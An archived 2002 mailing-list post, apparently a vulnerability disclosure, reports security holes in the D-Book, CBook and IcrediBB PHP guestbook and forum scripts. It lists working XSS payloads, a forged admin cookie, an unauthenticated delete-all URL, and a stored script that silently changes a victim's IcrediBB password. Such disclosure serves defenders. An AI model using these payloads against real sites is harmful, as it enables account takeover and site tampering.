Security holes : D-Book, CBook, IcrediBB

From: frog frog (leseulfrogat_private)
Date: Fri Apr 12 2002 - 05:09:53 PDT

Next message: Replugge [ROD]: "PHP Nuke All version - ("viewdownload" Path disclosure vulns) + (some XSS)"

Previous message: incubus: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Product 1 : D-Book http://www.smartbb.net Versions : 1.4 (and less ?) Problems : - XSS - Admin access Exploits : - [img=javascript:alert(%27hum%27)] - Cookie "logged,anyvalue" on admin.php More details in french : http://www.ifrance.com/kitetoua/tuto/D-Book.txt translated by Google : http://translate.google.com/translate?u=http%3A% 2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FD- Book.txt&langpair=fr%7Cen&hl=fr&prev=% 2Flanguage_tools **************************************** Product 2 : CBook Versions : 1.0.1 beta Problems : - XSS - Access to an admin function (delete all entries) Exploits : - <script>ANYSCRIPT</script> on profil - http://www.site.com/index.php?Change=2 More details in french : http://www.ifrance.com/kitetoua/tuto/Cbook.txt translated by google : http://translate.google.com/translate?u=http%3A% 2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto% 2FCbook.txt&langpair=fr%7Cen&hl=fr&prev=% 2Flanguage_tools *********************************************** Product 3: IcrediBB Bulletin Board System http://www.icredibb.com Versions : 1.1 beta Problems : - Access to users/admins account - XSS Exploits : - To change password, in a private message : <sc*ript> window.open('usercp.php? function=changepass&newpassword=PASS&passve rify=PASS&submitnewpass=Submit'); window.open('usercp.php? function=changepass&newpassword=PASS&passve rify=PASS&submitnewpass=Submit'); window.open('usercp.php? function=changepass&newpassword=PASS&passve rify=PASS&submitnewpass=Submit'); window.open('index.php?function=logout'); window.open('usercp.php? function=changepass&newpassword=PASS&passve rify=PASS&submitnewpass=Submit'); </s*cript> (without '*') - In subject (private message) : <script>ANYSCRIPT</script> - In webbrowser : /pm.php? function=sendpm&to=VICTIM&subject=SUBJECT&im ages= javascript:alert('hello') &message=MESSAGE&submitpm=Submit PM /pm.php? function=sendpm&to=VICTIM&subject=SUBJECT&im ages= javascript:window.open('http:%2F%2Fwww.url.com') &message=MESSAGE&submitpm=Submit PM /pm.php? function=sendpm&to=VICTIM&subject=SUBJECT&im ages= javascript:a='http:%2F%2Fwww.url.com'% 3Bwindow.open(a)% 3B&message=MESSAGE&submitpm=Submit PM - In /usercp.php?function=avataroptions : javascript:alert(%27HeLLo%27) More details in french : http://www.ifrance.com/kitetoua/tuto/icrediBB.txt translated by google : http://translate.google.com/translate?u=http%3A% 2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto% 2FicrediBB.txt&langpair=fr%7Cen&hl=fr&prev=% 2Flanguage_tools ************************************************** frog-m@n

Next message: Replugge [ROD]: "PHP Nuke All version - ("viewdownload" Path disclosure vulns) + (some XSS)"
Previous message: incubus: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 10:07:55 PDT